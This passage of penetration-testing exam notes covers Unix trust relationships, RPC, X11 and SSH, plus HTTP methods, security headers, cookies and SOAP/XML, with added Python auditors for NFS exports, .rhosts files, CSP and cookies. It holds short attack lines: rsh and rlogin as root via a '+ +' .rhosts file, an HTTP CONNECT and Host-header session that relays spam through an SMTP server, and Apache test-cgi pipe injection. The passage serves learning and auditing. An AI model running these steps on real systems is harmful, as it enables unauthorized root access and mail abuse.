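The two trust files discussed under F5 and F6, /etc/exports and .rhosts (hosts.equiv has the same layout), as an added audit example that is not part of the original notes. It parses the Linux exports syntax, applies the exportfs defaults (ro and root_squash when an option is absent), flags any-host and wildcard exports, writable exports and no_root_squash, and flags "+" wildcards in rhosts-style files. Both sample files are constructed for the example.

```python
def parse_exports(text: str):
    """Parse Linux /etc/exports syntax: '<path> host1(opts) host2(opts) ...'.
    A spec with no host part, e.g. '(ro)', or a path with no specs at all, means 'any host'."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        path, clients = fields[0], []
        for spec in fields[1:]:
            host, _, opts = spec.partition("(")
            options = [o for o in opts.rstrip(")").split(",") if o]
            clients.append((host or "*", options))
        exports.append((path, clients or [("*", [])]))
    return exports


def audit_exports(text: str):
    """Return (path, host, issue) for every export that trusts too widely or too deeply.
    Defaults when an option is absent are ro and root_squash, so only the explicit
    opposites are flagged."""
    findings = []
    for path, clients in parse_exports(text):
        for host, options in clients:
            if host == "*":
                findings.append((path, host, "exported to any host"))
            elif "*" in host or "?" in host:
                findings.append((path, host, "wildcard host"))
            if "rw" in options:
                findings.append((path, host, "writable"))
            if "no_root_squash" in options:
                findings.append((path, host, "no_root_squash: remote root is root here"))
            if "insecure" in options:
                findings.append((path, host, "insecure: non-privileged source ports allowed"))
    return findings


def parse_rhosts(text: str):
    """Parse .rhosts / hosts.equiv lines into (host, user); a missing user means 'same username'.
    '+' in either column is a wildcard; a leading '-' on a host is an explicit deny."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        entries.append((fields[0], fields[1] if len(fields) > 1 else None))
    return entries


def audit_rhosts(text: str):
    """Return (host, user, issue) for every entry that trusts any host or any user."""
    findings = []
    for host, user in parse_rhosts(text):
        if host == "+" and user == "+":
            findings.append((host, user, "any user from any host, no password"))
        elif host == "+":
            findings.append((host, user, "any host trusted for this user"))
        elif user == "+":
            findings.append((host, user, f"any user on {host} trusted"))
    return findings


# Constructed sample files (not taken from any real host).
SAMPLE_EXPORTS = """
/export/home   *(rw,no_root_squash)
/srv/backup    192.168.0.0/24(ro) admin.example.com(rw,sync)
/srv/www       *.example.com(rw)
/srv/share     (ro)      # no host part at all
"""
SAMPLE_RHOSTS = """
+ +
buildbox.example.com  bob
"""

if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS) + audit_rhosts(SAMPLE_RHOSTS):
        print(*finding, sep="  ")
```

The /export/home line is the case the UID-manipulation walkthrough above depends on: any host, writable, and root not squashed, so a remote root can write a setuid binary or edit files as UID 0. The "+ +" rhosts entry is the one that makes rsh -l root and rlogin -l root work without a password.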
 rusers is an RPC service (portmapper on TCP 111); if found running: rusers -l hostname
 exec - TCP 512 (rexec; needs a username, -l, and a password, -p)
 login - TCP 513 (rlogin; needs a username, -l)
 rwho - UDP 513; accessed by issuing rwho host
 shell - TCP 514 (rsh; needs a login name, -l)
Impact of poorly-configured trust relationships
Depending on the files stored in an exported NFS folder it might be possible to obtain shell access via SSH, or via rsh and rlogin. Interesting files to examine are authorized_keys and .rhosts. Both are hidden files, so from the NFS folder issue ls -la. The .rhosts file specifies which remote hosts and users can access a local account on the system. If .rhosts contains "+ +" (plus, space, plus) it allows connections from any host on the network and from any username. The following commands then let the root user of the attacking system connect to the target directly, since the system will not prompt for a password when all users from all systems are trusted:
    rsh -l root IP
    rlogin -l root IP

F7 - X11
X Windows security and configuration; host-based vs. user-based access control.
X servers listen on TCP ports 6000+ (depending on the number of concurrent displays). The DISPLAY variable has three components: <host>:<display>[.<screen>]. When DISPLAY is set to host:4, short for tcp/host:4, clients use TCP to connect to the server on port 6000 plus the display number (6004 in that case). When X forwarding is requested from an SSH server, the server sets DISPLAY to localhost:10.0 and starts listening on 127.0.0.1 port 6010. In general Xorg listens on port 6000+n, where n is the display number.
xwd allows you to take screenshots of the display.
xhost authentication (host-based): a set of hosts is authorised to connect to the X display server. The xhost command is used with + and - to allow and deny X access from individual hosts; the server also reads /etc/X<n>.hosts (e.g. /etc/X0.hosts for display 0), which contains the host-based access list.
xauth authentication (user-based): the xauth command manages the $HOME/.Xauthority file, which holds one cookie for each X display the user can use.

F8 - RPC services
RPC service enumeration
The RPC portmapper is a server that converts RPC program numbers into TCP/IP (or UDP/IP) protocol port numbers.
Several interesting Unix daemons, such as Network Information Service+ (NIS+), Network File System and Common Desktop Environment, run as RPC services on dynamically assigned high ports. The portmapper service (aka rpcbind) runs on TCP/UDP port 111 (and 32771 on Solaris) and can be queried using rpcinfo to discover the available services and their port numbers. The Nmap documentation states that if the portmapper is filtered, services can be identified directly by scanning high port ranges (TCP/UDP 32771-34000). The RPC grinding scan is done as part of an aggressive scan (-A) or can be called explicitly with -sR.
    rpcinfo -p 192.168.0.50      (note: -p, not -l)
In networks protected by firewalls and other mechanisms, access to the RPC portmapper service on port 111 is often filtered. Determined attackers therefore scan high port ranges (UDP and TCP ports 32771 through 34000 on Solaris hosts) to identify RPC services that are open to direct attack. You can run Nmap with the -sR option to identify RPC services listening on high ports if the portmapper is inaccessible.

Common RPC services
    # rpcinfo -p 192.168.0.50
    program  vers  proto  port   service
    100000   4     tcp    111    rpcbind
    100000   4     udp    111    rpcbind
    100024   1     udp    32772  status
    100024   1     tcp    32771  status
    100021   4     udp    4045   nlockmgr
    100021   2     tcp    4045   nlockmgr
    100005   1     udp    32781  mountd
    100005   1     tcp    32776  mountd
    100003   2     udp    2049   nfs
    100011   1     udp    32822  rquotad
    100002   2     udp    32823  rusersd
    100002   3     tcp    33180  rusersd
sprayd - rpc.sprayd is a server that records the packets sent by spray. spray sends a one-way stream of packets to a host using RPC and reports how many were received, as well as the transfer rate. The host argument can be either a name or an Internet address.
Other RPC services: walld, ypbind (finds the server for NIS domains and maintains the NIS binding information), status, nlockmgr, rquotad.
Recent or commonly-found RPC service vulnerabilities.

F9 - SSH
 Dsniff v2.3 contains a tool called sshmitm, used to conduct MITM attacks on SSH1. The tool exploits a weakness in the host key authentication phase (clients that accept an unknown host key). SSH2 is not susceptible to sshmitm: it prevents MITM through server host authentication (the server's private key) and stronger client authentication (public keys).
 SSHv1 was found to have a remote integer overflow vulnerability (in the CRC32 compensation attack detector) that allowed attackers to run code as root.
Versions 1 and 2 of the SSH protocol
 SSHv1 and SSHv2 do not interoperate, as the protocol was entirely rewritten (the exception being the SSH 1.99 compatibility indicator).
 SSH servers that advertise themselves as 1.99 (e.g. SSH-1.99-OpenSSH_4.1) are really SSH-2 servers that are configured to fall back to SSH-1 if requested.
- However, if SSH 1.99 is reported, then both SSH 1.5 and SSH 2.0 are supported. SSH version 1.99 is merely an indication that the server supports both SSH version 2 *and* SSH version 1.
- SSH2 added a number of new features to provide a stronger, more comprehensive product. These features include:
  - Encryption ciphers, such as 3DES and AES.
  - The use of sound cryptographic Message Authentication Code (MAC) algorithms for integrity checking.
  - Support for public key certificates.

Identify the types and versions of SSH software in use
ssh -V   (e.g. ssh -V localhost or ssh -V 127.0.0.1)
-V  Display the version number and exit.

Authentication mechanisms within SSH
- Public/private key pairs for authentication - generating an SSH key pair and adding the public key to the list of authorized keys allows a user to connect via SSH to the NFS server.
- Passwords
Appendix G: Web Technologies

G1 - Web Server Operation
How a web server functions in terms of the client/server architecture. Concepts of virtual hosting and web proxies.

G2 - Web Servers & their Flaws
Common web servers, their fundamental differences and the vulnerabilities associated with them:

IIS
IIS 5.0 shipped with Windows 2000, IIS 6 shipped with Windows 2003, IIS 7 shipped with Windows 2008. ISAPI filters are DLL files that can be used to modify and enhance the functionality provided by IIS. ISAPI filters always run on an IIS server, filtering every request until they find one they need to process. The ability to examine and modify both incoming and outgoing streams of data makes ISAPI filters powerful and flexible.

Apache (and variants)
- The Apache 2.0.x Win32 installation ships with a default script, /cgi-bin/test-cgi.bat, that allows an attacker to execute commands on the Apache server (although it is reported that any .bat file could open this vulnerability). An attacker can send a pipe character with commands appended as parameters, which are then executed by Apache.
- The mod_userdir module allows each user account on the server to have a personal website in the home directory, accessible via a <server URL>/~username alias.
- Apache returns error 404 when the user account whose personal site is requested doesn't exist, and error 403 when no website is found in that user's home folder. The difference in errors exposes valid user account names on the server.
- Apache chunk handling - impacts Apache 1.3.23 (FreeBSD), 1.3.20 and 1.3.23-24 (OpenBSD), Apache 1.3.12, 1.3.20, 1.3.22-24 (NetBSD); the Apache-Nosejob exploit script was released for it.

Other Web Application Servers
- IBM WebSphere Application Server
- Oracle WebLogic Server is a Java EE application server
- Apple WebObjects

G3 - Web Enterprise Architectures
Design of tiered architectures.
Web applications are designed across three layers:
- Presentation tier
- Application tier
- Data tier

The concepts of logical and physical separation. Differences between presentation, application and database layers. Multi-layered architecture is a client-server architecture in which presentation, application processing, and data management functions are physically separated. The most widespread use of multi-tier architecture is the three-tier architecture.
G4 - Web Protocols
HTTP, HTTPS

HTTP CONNECT

telnet www.example.org 80
Trying 192.168.0.14...
Connected to 192.168.0.14.
Escape character is '^]'.
CONNECT maila.microsoft.com:25 HTTP/1.0

HTTP/1.0 200 Connection established
220 inet-imc-02.redmond.corp.microsoft.com Microsoft.com ESMTP Server

Note the two carriage returns (the blank line) after the CONNECT request. Status 200 shows the connection was established. A failed connection will display 405 Method Not Allowed, or a diversion to a generic web page. You can also use HTTP POST, in which case you specify http in the connection attempt:

POST http://mail.microsoft.com:25/ HTTP/1.0

HTTP GET can be used along with the Host header:

telnet www.example.org 80
Trying 192.168.0.14...
Connected to 192.168.0.14.
Escape character is '^]'.
GET / HTTP/1.1
Host: mx4.sun.com:25

HELO .
MAIL FROM: spammer@alter.net
RCPT TO: targtet@unsuspecting.com
DATA
Subject: Look Ma!
.

HTTP Methods

HTTP 1.0
- GET
- POST - although the URL can still be bookmarked, any parameters sent in the message body will be excluded from the bookmark. These parameters are also excluded from the various locations in which logs of URLs are maintained and from the Referer header.
- HEAD - functions in the same way as a GET request, except that the server should not return a message body in its response. The server should return the same headers that it would have returned to the corresponding GET request.

HTTP 1.1
- OPTIONS - asks the server to report the HTTP methods that are available for a particular resource.
- PUT
- DELETE
- CONNECT - used by proxy servers. Can be abused to establish connections with arbitrary hosts.
- TRACE - designed for diagnostic purposes. The server should return in the response body the exact contents of the request message it received. This can be used to detect the effect of any proxy servers between the client and server that may manipulate the request.
WebDAV: PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK

HTTP Headers
- The Pragma header instructs the browser not to store the response in its cache.
- The Expires header indicates that the response content expired in the past and therefore should not be cached.
These instructions are frequently issued when dynamic content is being returned, to ensure that browsers obtain a fresh version of this content on subsequent occasions. Pragma is the HTTP/1.0 implementation and Cache-Control is the HTTP/1.1 implementation of the same concept. Both are meant to prevent the client (i.e. the browser, not a proxy) from caching the response. Older clients may not support HTTP/1.1, which is why the Pragma header is still in use.

<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-store" />

(The exam tries to confuse this with no-cache.)

HTTP Authentication
- Basic is a simple authentication mechanism that sends user credentials as a Base64-encoded string in a request header with each message.
- NTLM is a challenge-response mechanism and uses a version of the Windows NTLM protocol.
- Digest is a challenge-response mechanism and uses MD5 checksums of a nonce with the user's credentials.

All HTTP web methods and response codes.
GET, POST, PUT, DELETE, OPTIONS, TRACE, HEAD, CONNECT

1xx Informational responses
- 100 Continue
- 101 Switching Protocols
- 102 Processing
- 103 Early Hints

2xx Success
- 200 OK
- 201 Created
- 202 Accepted
- 203 Non-Authoritative Information (since HTTP/1.1)
- 204 No Content
- 205 Reset Content
- 206 Partial Content (RFC 7233)
- 207 Multi-Status (WebDAV; RFC 4918)
- 208 Already Reported (WebDAV; RFC 5842)
- 226 IM Used (RFC 3229)

3xx Redirection
- 300 Multiple Choices
- 301 Moved Permanently - the requested resource has been definitively moved to the URL given by the Location header
- 302 Found - temporarily moved to the URL given by the Location header
- 304 Not Modified (RFC 7232)
- 306 Switch Proxy
- 307 Temporary Redirect (since HTTP/1.1)
- 308 Permanent Redirect (RFC 7538)

4xx Client errors
- 400 Bad Request
- 401 Unauthorized - similar to 403 Forbidden, but specifically for use when authentication is required and has failed or has not yet been provided.
- 402 Payment Required - reserved for future use
- 403 Forbidden
- 404 Not Found
- 405 Method Not Allowed
- 406 Not Acceptable
- 407 Proxy Authentication Required
- 408 Request Timeout
- 409 Conflict
- 410 Gone

5xx Server errors
- 500 Internal Server Error
- 501 Not Implemented
- 502 Bad Gateway
- 503 Service Unavailable
- 504 Gateway Timeout
- 505 HTTP Version Not Supported
- 506 Variant Also Negotiates (RFC 2295)
- 507 Insufficient Storage (WebDAV; RFC 4918)
- 508 Loop Detected (WebDAV; RFC 5842)
- 510 Not Extended (RFC 2774)
- 511 Network Authentication Required (RFC 6585)

HTTP header fields relating to security features
- X-Frame-Options - this header tells the browser if and when a page may be displayed as part of another page (i.e. in an IFRAME). Allowing a page to be loaded inside an IFRAME opens up the risk of a so-called clickjacking attack. X-Frame-Options can be used with the following options: DENY, SAMEORIGIN, ALLOW-FROM uri (where uri is the desired origin, including the protocol handler). Unless your application explicitly requires being loaded inside an IFRAME, you should set the header to DENY.
- Strict-Transport-Security - this header, often abbreviated as HSTS (HTTP Strict Transport Security), tells the browser to enforce an HTTPS connection whenever a user tries to reach the site sending this header. All major browsers support this feature and should: only connect to the site via HTTPS; convert all HTTP references on the site (e.g. JavaScript includes) to HTTPS; and refuse to load the website in case of errors with the SSL certificate (e.g. certificate expired, broken certificate chain, ...). It is important to note that as this header can only be set via an HTTPS response, the user needs to connect to the site at least once via HTTPS. As the HSTS header is only recognised when sent over an HTTPS connection, websites can still allow users to interact with the website over HTTP, to retain compatibility with non-HTTPS user agents.
- X-XSS-Protection - the purpose of this header is to instruct the web browser to use its built-in cross-site scripting protection.
- X-Content-Type-Options - the nosniff directive forces the browser to render the content in accordance with the Content-Type header, and thereby stops the browser from performing content sniffing to guess the type of content returned by the web server.
- Content-Security-Policy - the CSP is sent from the server to stipulate the locations from which scripts can be loaded. It also stipulates restrictions on those scripts, for example whether the eval() JS function can be used. The Content-Security-Policy (CSP for short) is a flexible approach to specifying which content in a site may be executed and which not. One of the current problems is that the web browser does not know which sources to trust and which not to trust, e.g. is a third-party JavaScript include from apis.google.com good or bad?
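To make the source-list semantics concrete, here is an added Python example (mine, not from these notes) that parses a Content-Security-Policy header and decides whether a resource URL may be loaded by a page at a given origin; it is exercised against the two policies quoted in these notes. The directive fallback to default-src, the 'self' origin comparison and the http-to-https upgrade rule follow the CSP specification; the function names and the sample page origin https://example.com/ are my own assumptions.

```python
"""Minimal Content-Security-Policy source-list evaluator (added example, not from the CREST notes)."""
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}

# Fetch directives that fall back to default-src when they are not set explicitly.
FALLS_BACK_TO_DEFAULT = {
    "script-src", "style-src", "img-src", "media-src", "font-src",
    "connect-src", "object-src", "child-src", "frame-src", "worker-src",
}


def parse_csp(header: str) -> dict:
    """Parse 'directive src src; directive src' into {directive: [sources]}.

    Directives are separated by ';' and sources by whitespace; the first occurrence
    of a directive wins and later duplicates are ignored, as the CSP spec requires.
    """
    policy = {}
    for chunk in header.split(";"):
        tokens = chunk.split()
        if tokens:
            policy.setdefault(tokens[0].lower(), tokens[1:])
    return policy


def _origin(url: str) -> tuple:
    """(scheme, host, effective port) of a URL: the triple the same-origin comparison uses."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    return scheme, (parts.hostname or "").lower(), parts.port or DEFAULT_PORTS.get(scheme)


def _host_matches(pattern: str, host: str) -> bool:
    pattern, host = pattern.lower(), host.lower()
    if pattern == "*":
        return True
    if pattern.startswith("*."):      # *.example.com covers sub.example.com but not example.com itself
        return host.endswith(pattern[1:]) and host != pattern[2:]
    return pattern == host


def _source_matches(source: str, resource: str, page: str) -> bool:
    """Does one source expression permit loading `resource` into the page at `page`?"""
    scheme, host, port = _origin(resource)
    if source == "'none'":
        return False
    if source == "'self'":
        return (scheme, host, port) == _origin(page)
    if source.startswith("'"):        # 'unsafe-inline', 'unsafe-eval', nonces, hashes: not URL matchers
        return False
    if source == "*":                 # any network scheme; data:, blob: and filesystem: are excluded
        return scheme not in ("data", "blob", "filesystem")
    if source.endswith(":") and "://" not in source:   # scheme-source such as "https:" or "data:"
        return scheme == source[:-1].lower()
    # host-source: [scheme://]host[:port][/path]
    if "://" in source:
        src_scheme, rest = source.split("://", 1)
        src_scheme = src_scheme.lower()
        # "http://host" also matches https://host (secure upgrade); other schemes must match exactly
        if scheme != src_scheme and not (src_scheme == "http" and scheme == "https"):
            return False
    else:
        rest = source                 # no scheme given: inherit the page's scheme, or allow https
        if scheme not in (_origin(page)[0], "https"):
            return False
    src_host, _, src_port = rest.split("/", 1)[0].partition(":")
    if not _host_matches(src_host, host):
        return False
    return not src_port or src_port == "*" or str(port) == src_port


def is_allowed(policy: dict, directive: str, resource: str, page: str) -> bool:
    """True if the policy lets the page at `page` load `resource` under the given fetch directive."""
    sources = policy.get(directive)
    if sources is None and directive in FALLS_BACK_TO_DEFAULT:
        sources = policy.get("default-src")
    if sources is None:               # no applicable directive: CSP imposes no restriction
        return True
    return any(_source_matches(src, resource, page) for src in sources)


def inline_allowed(policy: dict, directive: str = "script-src") -> bool:
    """Inline scripts and event-handler attributes run only with the blanket 'unsafe-inline'
    (per-element nonces and hashes are not modelled here)."""
    sources = policy.get(directive)
    if sources is None:
        sources = policy.get("default-src", [])
    return "'unsafe-inline'" in sources


if __name__ == "__main__":
    # The policy quoted in the notes, evaluated for a page at https://example.com/ (assumed page origin)
    policy = parse_csp("default-src 'self'; img-src *; media-src media1.com media2.com; "
                       "script-src userscripts.example.com")
    page = "https://example.com/"
    for directive, url in [("script-src", "https://userscripts.example.com/app.js"),
                           ("script-src", "https://apis.google.com/x.js"),
                           ("img-src", "http://anything.net/pic.png"),
                           ("media-src", "https://media3.com/v.mp4"),
                           ("style-src", "https://cdn.example.com/s.css")]:
        verdict = "allowed" if is_allowed(policy, directive, url, page) else "blocked"
        print(f"{directive:11} {url:45} -> {verdict}")
    print("inline scripts allowed:", inline_allowed(policy))
```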
The only proper solution to this is source whitelisting, where the developer specifies legitimate resource locations. To enable CSP, you need to configure your web server to return the Content-Security-Policy HTTP header (sometimes you will see mentions of the X-Content-Security-Policy header, but that's an older version and you don't need to specify it anymore). Alternatively, the <meta> element can be used to configure a policy, for example:

<meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';">

A primary goal of CSP is to mitigate and report XSS attacks. XSS attacks exploit the browser's trust of the content received from the server. Malicious scripts are executed by the victim's browser because the browser trusts the source of the content, even when it's not coming from where it seems to be coming from. CSP makes it possible for server administrators to reduce or eliminate the vectors by which XSS can occur by specifying the domains that the browser should consider to be valid sources of executable scripts. A CSP-compatible browser will then only execute scripts loaded in source files received from those whitelisted domains, ignoring all other script (including inline scripts and event-handling HTML attributes).

Example: a web site administrator wants to allow users of a web application to include images from any origin in their own content, but to restrict audio or video media to trusted providers, and all scripts only to a specific server that hosts trusted code:

Content-Security-Policy: default-src 'self'; img-src *; media-src media1.com media2.com; script-src userscripts.example.com

CORS (Cross-Origin Resource Sharing)
CORS allows cross-domain HTTP data exchange, which means a page running at origin A can send/receive data from a server at origin B. CORS is abundantly used in web applications where web fonts, CSS, documents, and so on are loaded from different origins, which may not be the origin where the resources are actually stored.

URL with Session Data
URL-authenticated links: this approach is generally only used without authentication for things like password resets. The unguessable link typically expires within a short period of time, and can only be used by someone already semi-authenticated (i.e. the website already knows the email address to which the link was sent). Even though developers use the "HttpOnly" session cookie, the leakage of the session ID in the URL and page body nullifies the effectiveness of the "HttpOnly" flag.

Cookies
Set-Cookie header. The Set-Cookie header of the HTTP responses from the web server carries the Secure and HttpOnly flags. Expires sets a date until which the cookie is valid. This causes the browser to save the cookie to persistent storage, and it is reused in subsequent browser sessions until the expiration date is reached. If this attribute is not set, the cookie is used only in the current browser session.

Expires=<date> - the maximum lifetime of the cookie as an HTTP-date timestamp. If not specified, the cookie will have the lifetime of a session cookie. A session is finished when the client is shut down, meaning that session cookies are removed at that point. If a cookie presents the "Max-Age" (which takes preference over "Expires") or "Expires" attribute, it is considered a persistent cookie and is stored on disk by the web browser until the expiration time.
- Persistent cookies are stored in a text file on the client's computer.
- Non-persistent cookies are stored in RAM on the client and are destroyed when the browser is closed (also called in-memory cookies).
- Session cookies are created when you create a session object.
- A session can be created without cookies (e.g. by carrying the session ID in the URL), but that makes the URL look ugly.
The Secure flag forces the browser to transmit the cookie only over an encrypted channel such as HTTPS (this differs from HSTS, which forces the entire connection over HTTPS). This prevents eavesdropping, especially when an HTTPS connection is downgraded to HTTP through tools such as SSLStrip. The syntax is as follows:

Set-Cookie: Name=Value; expires=Wednesday, 01-May-2014 12:45:10 GMT; Secure

In this HTTP header, Secure instructs the browser to transmit the cookie through a secure encrypted channel, thereby encasing the session token in an encrypted barrier.

HttpOnly is a flag attached to cookies that instructs the browser not to expose the cookie to client-side scripts (document.cookie and others). It disallows access to the cookie from any script. The agenda behind HttpOnly is not to spill cookies when an XSS vulnerability exists: an attacker might still be able to run their script, but the fundamental benefit of an XSS vulnerability (the ability to steal cookies and hijack a currently established session) is lost. HttpOnly cookies were first introduced in Microsoft's Internet Explorer 6 SP1, and this has since become common practice when setting session cookies. The syntax is as follows:

Set-Cookie: Name=Value; expires=Wednesday, 01-May-2014 12:45:10 GMT; HttpOnly

In this HTTP header, HttpOnly instructs the browser to save the cookie without exposing it to client-side scripts.
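As an added example (mine, not from these notes), the Python below parses a Set-Cookie header, reports the missing Secure/HttpOnly flags and the persistence attributes discussed above, and decides whether a browser will attach the cookie to a later request, applying the Domain and Path scoping rules covered in the next section. Matching follows RFC 6265 as modern browsers implement it (a cookie without a Domain attribute goes only to the exact host that set it, and a Path is matched at a directory boundary, so path=/app1 does not cover /app1-test/); the URLs and cookie values are constructed samples.

```python
"""Set-Cookie audit and cookie scoping rules (added example, not from the CREST notes)."""
from urllib.parse import urlsplit


def parse_set_cookie(header: str) -> dict:
    """Split 'name=value; attr=val; Flag' into name, value and a lower-cased attribute map.
    Flag attributes without a value (Secure, HttpOnly) map to True."""
    first, *attrs = [part.strip() for part in header.split(";")]
    name, _, value = first.partition("=")
    cookie = {"name": name.strip(), "value": value.strip(), "attrs": {}}
    for attr in attrs:
        if attr:
            key, _, val = attr.partition("=")
            cookie["attrs"][key.strip().lower()] = val.strip() if val else True
    return cookie


def audit_cookie(header: str) -> list:
    """Findings a tester would report for a session cookie set with this header."""
    attrs = parse_set_cookie(header)["attrs"]
    findings = []
    if "secure" not in attrs:
        findings.append("missing Secure: sent over plain HTTP, exposed to downgrade/eavesdropping")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: readable from document.cookie if an XSS flaw exists")
    if "domain" in attrs:
        findings.append("Domain=%s: shared with every sub-domain, any of which can overwrite it"
                        % attrs["domain"])
    if "expires" in attrs or "max-age" in attrs:
        findings.append("persistent cookie (Expires/Max-Age): stored on disk until expiry")
    return findings


def default_path(request_path: str) -> str:
    """RFC 6265 default-path: the request path up to (not including) its last '/'."""
    if not request_path.startswith("/") or request_path.count("/") == 1:
        return "/"
    return request_path.rsplit("/", 1)[0]


def domain_matches(cookie_domain: str, host: str) -> bool:
    """Domain=example.com covers example.com and every sub-domain, but no peer domain."""
    cookie_domain, host = cookie_domain.lower().lstrip("."), host.lower()
    return host == cookie_domain or host.endswith("." + cookie_domain)


def path_matches(cookie_path: str, request_path: str) -> bool:
    """Path=/app1/ covers /app1/ and its sub-directories; the match stops at a '/' boundary."""
    if request_path == cookie_path:
        return True
    if not request_path.startswith(cookie_path):
        return False
    return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"


def will_be_sent(header: str, set_by_url: str, request_url: str) -> bool:
    """Would a browser attach the cookie (set by a response from set_by_url) to request_url?"""
    attrs = parse_set_cookie(header)["attrs"]
    origin, req = urlsplit(set_by_url), urlsplit(request_url)
    if "secure" in attrs and req.scheme.lower() != "https":
        return False                                   # Secure cookies never travel over http
    if "domain" in attrs:
        if not domain_matches(attrs["domain"], req.hostname or ""):
            return False
    elif (req.hostname or "").lower() != (origin.hostname or "").lower():
        return False                                   # host-only cookie: exact host only
    path_attr = attrs.get("path")
    if isinstance(path_attr, str) and path_attr.startswith("/"):
        cookie_path = path_attr
    else:
        cookie_path = default_path(origin.path or "/")
    return path_matches(cookie_path, req.path or "/")


if __name__ == "__main__":
    # Constructed samples modelled on the headers quoted in the notes
    for hdr in ("SESSIONID=abc123; Path=/",
                "Name=Value; expires=Wednesday, 01-May-2014 12:45:10 GMT; Secure",
                "SESSIONID=abc123; Path=/; Secure; HttpOnly"):
        print(hdr, "->", audit_cookie(hdr) or ["no findings"])
    print(will_be_sent("cookie1=somedata; domain=microsoft.com;",
                       "https://server1.microsoft.com/", "https://server2.microsoft.com/"))  # True
    print(will_be_sent("cookie1=somedata",
                       "https://server1.microsoft.com/", "https://server2.microsoft.com/"))  # False
```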
Cookie Domains - the same cookie is sent to sub-domains, depending on what cookie scope is set. If server1.microsoft.com sets the cookie, the web browser will automatically send the cookie with all subsequent requests to that domain and its sub-domains (admin.server1.microsoft.com). The cookie will not be sent to the parent domain or peer domains (microsoft.com or server2.microsoft.com). This restriction can be overridden by a programmer by setting the domain attribute:

Set-Cookie: cookie1=somedata; domain=microsoft.com;

This will ensure that cookies are sent to the top-level domain as well as all sub-domains. The site blog.example.com can set cookies with scope blog.example.com or with scope example.com. Cookies with the latter scope will be sent back to secure.example.com if the user visits secure.example.com. If the site secure.example.com sets a cookie with scope example.com, then the site blog.example.com can overwrite that cookie arbitrarily. Whenever browsers see a cookie with the same name and scope as one that's already in the cookie jar, they discard the old cookie value and overwrite it with the new cookie. Thus, blog.example.com can overwrite any cookie whose scope is example.com.

Cookie Path Restrictions - the same cookie is sent for a folder and its sub-folders, but not for other directories (including the parent). If an application residing at http://microsoft.com/app1/index.jsp sets a cookie, the browser will automatically send this cookie with all requests for pages residing under the /app1/ directory and any sub-directories. The browser will not include the cookie with requests for any other directory on that server, including the parent directory. This restriction can be overridden by a programmer by setting the path attribute:

Set-Cookie: cookie1=somedata; path=/app1/

This will ensure that the cookie is only sent to the application residing at the /app1/ directory and its sub-directories.
If the trailing / is not specified, the browser will send the cookie to all directories that begin with app1, for example /app1-test/ or /app1-prod/.

SOAP
You can serve any content over HTTP, such as HTML, images, sound, video, etc. SOAP is an XML-based encoding of messages that are typically sent over HTTP. Just like HTTP sits on top of TCP/IP, SOAP sits on top of HTTP. Layers on top of layers... SOAP stands for Simple Object Access Protocol. It is XML-based and used for sending and receiving messages; it is defined in XML. If you look at a SOAP request, you can see both layers, with the HTTP headers at the top, followed by the SOAP message.
SOAP has three major characteristics:
- Extensibility (security and WS-Addressing are among the extensions under development)
- Neutrality (SOAP can operate over any protocol such as HTTP, SMTP, TCP, UDP, or JMS)
- Independence (SOAP allows for any programming model)

A document type definition (DTD) is a set of mark-up declarations that define a document type for an SGML-family mark-up language (SGML, XML, HTML). A DTD defines the legal building blocks of an XML document: it defines the document structure with a list of legal elements and attributes. After SOAP was first introduced, it became the underlying layer of a more complex set of web services, based on DTD:
- Web Services Description Language (WSDL)
- XML Schema
- Universal Description Discovery and Integration (UDDI)

Web Services Description Language (WSDL)
An XML-based application will have a WSDL file that defines the expected data format and request layout. This file should be accessible. The Web Services Description Language (WSDL) is an XML-based interface definition language that is used for describing the functionality offered by a web service. The acronym is also used for any specific WSDL description of a web service (also referred to as a WSDL file), which provides a machine-readable description of how the service can be called, what parameters it expects, and what data structures it returns. Therefore, its purpose is roughly similar to that of a type signature in a programming language. The current version of WSDL is WSDL 2.0. The meaning of the acronym has changed from version 1.1, where the "D" stood for "Definition".
Example WSDL file (excerpt):

<?xml version="1.0" encoding="UTF-8"?>
<description xmlns="http://www.w3.org/ns/wsdl"
             xmlns:tns="http://www.tmsws.com/wsdl20sample"
             xmlns:whttp="http://schemas.xmlsoap.org/wsdl/http/"
             xmlns:wsoap="http://schemas.xmlsoap.org/wsdl/soap/"
             targetNamespace="http://www.tmsws.com/wsdl20sample">
  <documentation>
    This is a sample WSDL 2.0 document.
  </documentation>
XML, XML Schema and DTD
An XML schema is a description of a type of XML document. It tells users to develop their XML to that schema, whereas an XML document is a form to communicate with another application or system (often disparate systems). To ensure data is in the right structure, a DTD (Document Type Definition) can be used. This defines the elements that may be included in your document, what attributes these elements have, and the ordering and nesting of the elements.

The critical difference between DTDs and XML Schema is that XML Schema uses an XML-based syntax, whereas DTDs have a unique syntax held over from SGML DTDs. Although DTDs are often criticised because of this need to learn a new syntax, the syntax itself is quite terse. The opposite is true for XML Schema, which is verbose, but also makes use of tags and XML, so that authors of XML should find the syntax of XML Schema less intimidating.

The DTD is declared in a DOCTYPE declaration beneath the XML declaration contained within an XML document:

Inline definition - where the DTD is contained within the XML:
<?xml version="1.0"?>
<!DOCTYPE documentelement [definition]>

External definition - inline is handy for a few docs, but an external definition reduces overhead by placing the DTD on a web server:
<?xml version="1.0"?>
<!DOCTYPE documentelement SYSTEM "documentelement.dtd">
The lowest level of definition in a DTD is that something is either CDATA or PCDATA: Character Data or Parsed Character Data. We can only define an element as text, and with this limitation it is not possible, for example, to force an element to be numeric. Attributes can be forced to a range of defined values, but they can't be forced to be numeric.

XML Schema Definition (XSD), or XML Schemas, provide a much more powerful means by which to define your XML document structure and limitations. XML Schemas are themselves XML documents. They reference the XML Schema namespace and even have their own DTD. XML Schemas provide a set of basic types. These types are much wider ranging than the basic PCDATA and CDATA of DTDs. They include most basic programming types such as integer, byte, string and floating-point numbers, but they also expand into Internet data types such as ISO country and language codes (en-GB for example).

